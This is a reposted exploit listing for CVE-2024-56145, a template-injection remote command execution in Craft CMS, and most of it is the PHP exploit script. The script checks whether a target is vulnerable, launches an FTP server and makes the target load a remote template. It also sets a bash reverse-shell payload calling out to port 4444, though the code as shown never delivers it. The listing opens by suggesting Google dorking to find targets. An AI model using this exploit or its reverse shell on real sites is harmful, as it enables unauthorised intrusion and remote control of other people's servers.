Exploit for Craft CMS 3.9.14 Remote Command Execution CVE-2024-56145

Name: Exploit for Craft CMS 3.9.14 Remote Command Execution CVE-2024-56145
Rating: 5 (16 reviews)
2025-03-13 | CVSS 9.3
## https://sploitus.com/exploit?id=PACKETSTORM:189769
=============================================================================================================================================
    | # Title     : Craft CMS 3.9.14 Remote Command Execution vulnerability                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://craftcms.com/docs/getting-started-tutorial/build/twig.html                                                          |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description:  exploits a Twig template injection vulnerability in Craft CMS by abusing the --templatesPath argument. The vulnerability allows arbitrary template loading via FTP, leading to remote code execution.
    
        (Related : https://packetstorm.news/files/id/188825/ Related CVE numbers:	CVE-2024-56145 ) .
    	
    [+] Payload : 
    
    [+] Set Target : line 52
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class Exploit {
        private $target;
        private $ftp_host;
        private $ftp_port;
        private $payload;
        
        public function __construct($target, $ftp_host, $ftp_port, $payload) {
            $this->target = $target;
            $this->ftp_host = $ftp_host;
            $this->ftp_port = $ftp_port;
            $this->payload = $payload;
        }
        
        public function checkVulnerability() {
            $nonce = bin2hex(random_bytes(4));
            $url = $this->target . '?--configPath=/' . $nonce;
            $response = file_get_contents($url);
            
            if (strpos($response, 'mkdir()') !== false && strpos($response, $nonce) !== false) {
                return true;
            }
            return false;
        }
        
        public function startFTPServer() {
            $ftp_command = "python3 -m pyftpdlib -p {$this->ftp_port} &";
            shell_exec($ftp_command);
        }
        
        public function triggerExploit() {
            $templatesPath = "ftp://{$this->ftp_host}:{$this->ftp_port}";
            $url = $this->target . "?--templatesPath=" . urlencode($templatesPath);
            file_get_contents($url);
        }
        
        public function execute() {
            if ($this->checkVulnerability()) {
                echo "[+] Target is vulnerable. Starting exploit...\n";
                $this->startFTPServer();
                sleep(2); // Allow FTP server to start
                $this->triggerExploit();
                echo "[+] Exploit triggered successfully.\n";
            } else {
                echo "[-] Target is not vulnerable.\n";
            }
        }
    }
    
    // Example Usage
    $target = "http://example.com";
    $ftp_host = "192.168.1.100";
    $ftp_port = 2121;
    $payload = "bash -c 'bash -i >& /dev/tcp/192.168.1.200/4444 0>&1'";
    
    $exploit = new Exploit($target, $ftp_host, $ftp_port, $payload);
    $exploit->execute();
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================